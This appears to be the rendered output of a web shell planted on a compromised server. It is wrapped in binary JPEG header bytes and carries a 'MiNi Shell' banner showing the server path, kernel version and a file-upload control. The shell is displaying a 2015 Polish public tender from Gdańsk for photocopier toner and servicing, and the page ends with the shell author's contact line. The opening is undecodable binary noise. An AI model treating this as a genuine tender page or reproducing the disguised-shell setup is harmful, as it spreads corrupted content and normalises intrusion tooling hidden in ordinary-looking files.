JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150130/22202-N-2015.html

<p class="kh_header"><b>Gdańsk: Dostawa tonerów do kserokopiarek oraz konserwacja i naprawa kserokopiarek</b><br>
<b>Numer ogłoszenia: 22202 - 2015; data zamieszczenia: 30.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gdański Zarząd Nieruchomości Komunalnych - Samorządowy Zakład Budżetowy , ul. Partyzantów 74, 80-254 Gdańsk, woj. pomorskie, tel. 58 3201032, 3200220, 3023282, faks 58 3458235.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gznk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa tonerów do kserokopiarek oraz konserwacja i naprawa kserokopiarek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)Przedmiotem zamówienia jest dostawa materiałów eksploatacyjnych i części zamiennych łącznie z dostawą tonerów do kserokopiarek oraz świadczenie usług konserwacji i naprawy kserokopiarek na potrzeby Gdańskiego Zarządu Nieruchomości Komunalnych Samorządowy Zakład Budżetowy. 
Konserwacje i naprawy obejmują w szczególności:
<br>a) przeglądy okresowe,
<br>b) regulacje oraz naprawy podzespołów wchodzących w skład kserokopiarek.

<br>Całkowita ilość kserokopiarek do konserwacji - 57 szt.
<br>Planowana ilość  tonerów -  731 szt.

<br>Kserokopiarki objęte obecnie gwarancją, będą podlegały obsłudze technicznej z chwilą upływu terminu gwarancji.

<br>2) Konserwacja  i przegląd kserokopiarek co najmniej raz na kwartał obejmuje następujące czynności:
<br>a) demontaż i montaż  obudów zewnętrznych i wewnętrznych,
<br>b) czyszczenie wnętrza (usuniecie pyłów papieru, tonera oraz kurzu),
<br>c) czyszczenie  zespołu czyszczącego bębna,
<br>d) czyszczenie zespołu optyki,
<br>e) czyszczenie kaset papieru,
<br>f) czyszczenie filtrów,
<br>g) czyszczenie drogi transportu papieru,
<br>h) czyszczenie napędu głównego,
<br>i) czyszczenie sekcji grzejnej,
<br>j) czyszczenie sekcji pobierania  papieru,
<br>k) demontaż i montaż  poszczególnych sekcji, zespołów w/w,
<br>l) sprawdzenie działania kserokopiarki,
<br>m) regulacja jakości kopii,
<br>n) dokonanie przeglądu sprawności urządzenia oraz poświadczenie wykonanej usługi protokołem  przeglądu,

<br>3) Naprawa obejmuje następujące czynności:
<br>a) naprawę usterek technicznych kserokopiarek wynikających z działania części określonych w pkt. 5) Określenie przedmiotu oraz wielkości lub zakresu zamówienia,
<br>b) wymianę uszkodzonych części urządzenia określonych w pkt. 5) Określenie przedmiotu oraz wielkości lub zakresu zamówienia,
<br>c) sprawdzenie poprawności działania sprzętu po naprawie,
<br>d) ekspertyzę opłacalności naprawy sprzętu.

<br>4) Dostawa materiałów eksploatacyjnych wraz z ich wymianą obejmuje tonery.

<br>5) Dostawa części zamiennych wraz z ich wymianą obejmuje:
<br>a) bęben światłoczuły (czarny, czerwony, żółty, niebieski),
<br>b) developer,
<br>c) lampę skanera, 
<br>d) wałek utrwalający grzejny,
<br>e) wałek dociskowy dolny,
<br>f) tuleję wałka utrwalającego grzejnego,
<br>g) zespół przeglądowy,
<br>h) zespół wywołania,
<br>i) zespół utrwalania.

<br>6) Naprawa i usługa standardowa obejmuje czynności wyszczególnione w pkt 2) i 5) Określenie przedmiotu oraz wielkości lub zakresu zamówienia 

<br>7) W przypadku wystąpienia naprawy i usługi nieprzewidzianej w w/w pkt 2) i 5) Określenie przedmiotu oraz wielkości lub zakresu zamówienia (usterka niestandardowa) wykonawca zobowiązany jest przystąpić do naprawy urządzenia. Zamawiający rozliczy się z Wykonawcą wg kosztu 1 rbg oraz materiałów wg cen zakupu (koszt 1 rbg obejmuje również koszty dojazdu).

<br>8) Miejsce zainstalowania kserokopiarek:
<br>- Dział Techniczny ul. Cygańska Góra 1;
<br>- Zarząd, Dział Eksploatacji, Dział Windykacji, Dział Umów i Rozliczeń, ul. Partyzantów 74; 
<br>- Dział Nieruchomości ul. Dyrekcyjna 6;
<br>BOM   nr  1                              ul. Sienna 6,
<br>BOM   nr  2                              ul. Zielona 8/9,
<br>BOM   nr  4                              ul. Trakt Św. Wojciecha 167,
<br>BOM   nr  7                              ul. Mściwoja II 44,
<br>BOM   nr  8                              ul. Śniadeckich 12,
<br>BOM   nr  9                              ul. Na Zaspę 31.

<br>9) Materiały eksploatacyjne (tonery) do kserokopiarek muszą spełniać następujące wymagania:
<br>a) być fabrycznie nowe w opakowaniach oryginalnych producenta i zabezpieczone gwarancją nienaruszenia opakowania oraz posiadać 12 miesięczną gwarancję licząc od daty dostawy materiału, a także być wyprodukowane w okresie ostatnich 12 miesięcy przed dostawą,
<br>b) posiadać oznaczenia jak: nazwa, producenta, nr produktu, oraz termin ważności,
<br>c) posiadać na opakowaniu indywidualny kod materiału eksploatacyjnego oraz nazwę sprzętu, do którego jest przeznaczony,
<br>d) posiadać na produkcie indywidualny kod producenta umożliwiający jednoznaczną identyfikację producenta,
<br>e) spełniać parametry takie jak: pojemność tonera, wydajność i jakość kopi, co najmniej jak materiały oryginalne tzn. pochodzące od producenta urządzenia, do którego materiał jest przeznaczony,
<br>-jakość- pracy materiałów eksploatacyjnych w urządzeniu kopiującym musi być bezawaryjna i bezproblemowa oraz nie może powodować ograniczeń funkcji i możliwości sprzętu oraz jakości kopi wyspecyfikowanych w warunkach technicznych producenta sprzętu (urządzenia), 
<br>- wydajność - zdolność materiału do wykonania odpowiedniej ilości stron kopi o odpowiednim pokryciu procentowym nadruku na kartce A-4, z odpowiednią przyczepnością barwnika i równomiernością pokrycia,
<br>f) nie mogą być regenerowane tzn. takie materiały eksploatacyjne, w których w ich procesie wytwarzania zostały wykorzystane gotowe elementy pochodzące z już zużytych materiałów eksploatacyjnych, jak np. 	dysze, obudowy itp, 
<br>g) nie mogą być poddawane procesowi ponownego napełniania,
<br>h) nie mogą powodować utraty gwarancji producenta sprzętu,
<br>i) nie mogą powodować uszkodzenia urządzeń, w których będą eksploatowane..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.12.13.00-6, 30.12.51.00-2, 30.12.40.00-4, 30.12.51.10-5, 50.31.00.00-1, 50.32.30.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Kwota wadium: 2 500,00 zł w tym:
<br>Zadanie 1 - 1 000,00 zł
<br>Zadanie 2 - 1 500,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku posiadania wiedzy i doświadczenia Wykonawca musiał wykonać w okresie ostatnich trzech lat przed upływem terminu składania ofert minimum:
<br>W przypadku składania oferty na zadanie 1 i/lub 2:
<br>- 2 usługi polegające na konserwacji lub naprawie kserokopiarek o wartości minimum 10 000,00 zł  brutto w okresie maksymalnym 12 miesięcy każda usługa,
<br>- 2 dostawy polegające na dostawie tonerów do kserokopiarek o wartości minimum 15 000,00 zł brutto w okresie maksymalnym 12 miesięcy każda dostawa.

<br>Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunek mogą spełniać łącznie.

<br>Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków udowadniając, iż będzie dysponował zasobami w trakcie realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia wymagane jest wykazanie: 
<br>a)  w przypadku składania oferty na zadanie 1:
<br>- 3 osób na stanowisku serwisanta, z co najmniej trzy letnim doświadczeniem w zakresie napraw  kserokopiarek, która została przeszkolona w zakresie napraw kserokopiarek Sharp przez producenta lub przedstawiciela producenta.
<br>b) w przypadku składania oferty na zadanie 2:
<br>- 3 osób na stanowisku serwisanta z co najmniej trzy letnim doświadczeniem w zakresie napraw kserokopiarek,  która została przeszkolona w okresie ostatnich trzech lat w zakresie napraw kserokopiarek Kyocera, przez producenta lub przedstawiciela producenta.

<br>W przypadku składania oferty na dwa zadania w/w warunki muszą być spełnione łącznie.

<br>W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagany dokument musi być złożony przez co najmniej jednego wykonawcę.

<br>Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, udowadniając, iż będzie dysponował osobami zdolnymi do wykonania zamówienia w trakcie realizacji zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Przez główne usługi i dostawy Zamawiający rozumie usługi i dostawy polegające na:
<br> w przypadku składania oferty na zadanie 1 i/lub 2:
<br>- konserwacji lub naprawie kserokopiarek o wartości minimum 10 000,00 zł brutto w okresie maksymalnym 12 miesięcy,
<br>- dostawie tonerów do kserokopiarek o wartości minimum 15 000,00 zł brutto w okresie maksymalnym 12 miesięcy.
<br>Zamawiający nie żąda informacji o usługach i dostawach niewykonanych lub wykonanych nienależycie;;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p><br>a) Złożyć Druk OFERTA, który należy sporządzić wg wzoru druku zamawiającego.
<br>b) Podać w złożonej ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcy lub nazwy podwykonawców, na których zasoby wykonawca powołuje się, w celu wykazania spełnienia warunku udziału w postępowaniu. W przypadku nie wskazania podwykonawców, zamawiający uzna, że całość zamówienia będzie wykonywana przez Wykonawcę osobiście.
<br>c) Podać w złożonej ofercie  czas przyjazdu Wykonawcy na miejsce wykonywania usługi od zgłoszenia.
<br>Maksymalny czas reakcji winien wynosić 4 godziny. Nie spełnienie tego wymogu spowoduje odrzucenie oferty.
<br>d) Załączyć kopię dowodu wpłaty wadium wpłaconego w pieniądzu lub oryginał albo kopię wadium wniesionego w jednej z form określonych w punkcie 14 SIWZ.
<br>e) Złożyć Formularze cenowe, które należy sporządzić wg wzorów  druku Zamawiającego odpowiednio na zadanie 1 i 2.
<br>f) Udzielić co najmniej 12 miesięcznej gwarancji na wykonane usługi natomiast na dostarczone części zamienne - gwarancji wynikającej z ogólnie obowiązujących warunków gwarancyjnych na poszczególne części,
<br>g) Wykazać, że oferta została podpisana przez osobę(y) uprawnioną(e) do występowania w imieniu i na rzecz Wykonawcy,
<br>h) Wykazać posiadanie na terenie Trójmiasta co najmniej jednego punktu serwisowego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.5</li>
<li>2 - Cena (suma cen jednostkowych netto konserwacji i napraw) - 0.35</li>
<li>3 - Cena  roboczogodziny naprawy usterki nieprzewidzianej - 0.05</li>
<li>4 - Czas przyjazdu Wykonawcy na miejsce wykonywania usługi od zgłoszenia - 0.1</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Następujące postanowienia umowy mogą ulec zmianie:
<br>1. Zmianie mogą ulec ilości kserokopiarek.   
<br> Zmiany w umowie mogą zostać wprowadzone przy zaistnieniu następujących okoliczności:
<br>1. Ilości kserokopiarek mogą ulec zmianie w przypadku likwidacji eksploatowanego sprzętu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gznk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 80-171 Gdańsk, ul Cygańska Góra 1, pok. nr 11 w godz. 9:00 - 12:00. 
<br>Cena brutto - 12,30 PLN.
<br>Warunki i sposób płatności: gotówka, przelew, zaliczenie pocztowe.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2015 godzina 10:00, miejsce: siedziba Zamawiającego, 80-171 Gdańsk, ul. Cygańska Góra 1, pokój nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 10.03.2015.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> DATA, GODZINA I MIEJSCE OTWARCIA OFERT: 09.02.2015 r. godzina  10:30, 
<br>miejsce w siedzibie zamawiającego 80-171 Gdańsk, ul. Cygańska Góra 1 w  pokoju nr 6, świetlica

<br>OSOBY UPRAWNIONE DO POROZUMIEWANIA SIĘ Z WYKONAWCAMI 
<br>Grażyna Berowska stanowisko służbowe starszy specjalista ds. zamówień publicznych, 
<br>80- 171 Gdańsk ul. Cygańska Góra 1, nr pok. 11, tel.  58 320 10 32
<br>Adres poczty elektronicznej: berowska@gznk.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa tonerów do kserokopiarek oraz konserwacja i naprawa kserokopiarek Sharp, Panasonic, Konica Minolta, Canon.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość kserokopiarek będących w użytkowaniu GZNK-SZB oraz przewidywana ilość tonerów: 
<br>Sharp Max 2300     szt 3; tonerów 36 szt. cz/b i 36 szt. kolor
<br>Sharp Max 2301     szt 1; tonerów 12 szt. cz/b i 12 szt. kolor
<br>Sharp Max 2310     szt 1; tonerów 12 szt. cz/b i 12 szt. kolor
<br>Panasonic FP 7713                 szt. 1; tonerów 12 szt.
<br>Panasonic DP 1810                 szt. 2; tonerów 24 szt.
<br>Konica Minolta Di 1611           szt. 7; tonerów 50 szt.
<br>Canon NP 6512                      szt. 3; tonerów  12 szt.
<br>Razem:
<br>- ilość kserokopiarek - 18
<br>- ilość tonerów - 218.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.13.00-6, 30.12.51.00-2, 30.12.40.00-4, 30.12.51.10-5, 50.31.00.00-1, 50.32.30.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.5</li>
<li>2. Cena (suma cen jednostkowych netto konserwacji i napraw) - 0.35</li>
<li>3. Cena  roboczogodziny naprawy usterki nieprzewidzianej - 0.05</li>
<li>4. Czas przyjazdu Wykonawcy na miejsce wykonywania usługi od zgłoszenia - 0.1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa tonerów do kserokopiarek oraz konserwacja i naprawa kserokopiarek Mita, Kyocera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość kserokopiarek będących w użytkowaniu GZNK-SZB oraz przewidywana ilość tonerów: 
<br>Mita DC 1560          szt.  2; tonerów   24 szt.
<br>Mita DC 1860          szt.  1; tonerów   12 szt.
<br>Mita KM 1620          szt.16; tonerów 192 szt.
<br>Kyocera TA 180       szt.  6; tonerów   72 szt.
<br>Kyocera TA 181       szt.  9; tonerów 108 szt.
<br>Kyocera TA 3050Ci  szt.  4; tonerów   48 szt. cz/b i po 3 kpl. kolor (36 szt.)
<br>Kyocera TA 3051Ci  szt.  1; tonerów   12 szt. cz/b i po 3 kpl. kolor (9 szt.)
<br>Razem:
<br>- ilość kserokopiarek - 39
<br>- ilość tonerów - 513.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.13.00-6, 30.12.51.00-2, 30.12.40.00-4, 30.12.51.10-5, 50.31.00.00-1, 50.32.30.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.5</li>
<li>2. Cena (suma cen jednostkowych netto konserwacji i napraw) - 0.35</li>
<li>3. Cena  roboczogodziny naprawy usterki nieprzewidzianej - 0.05</li>
<li>4. Czas przyjazdu Wykonawcy na miejsce wykonywania usługi od zgłoszenia - 0.1</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com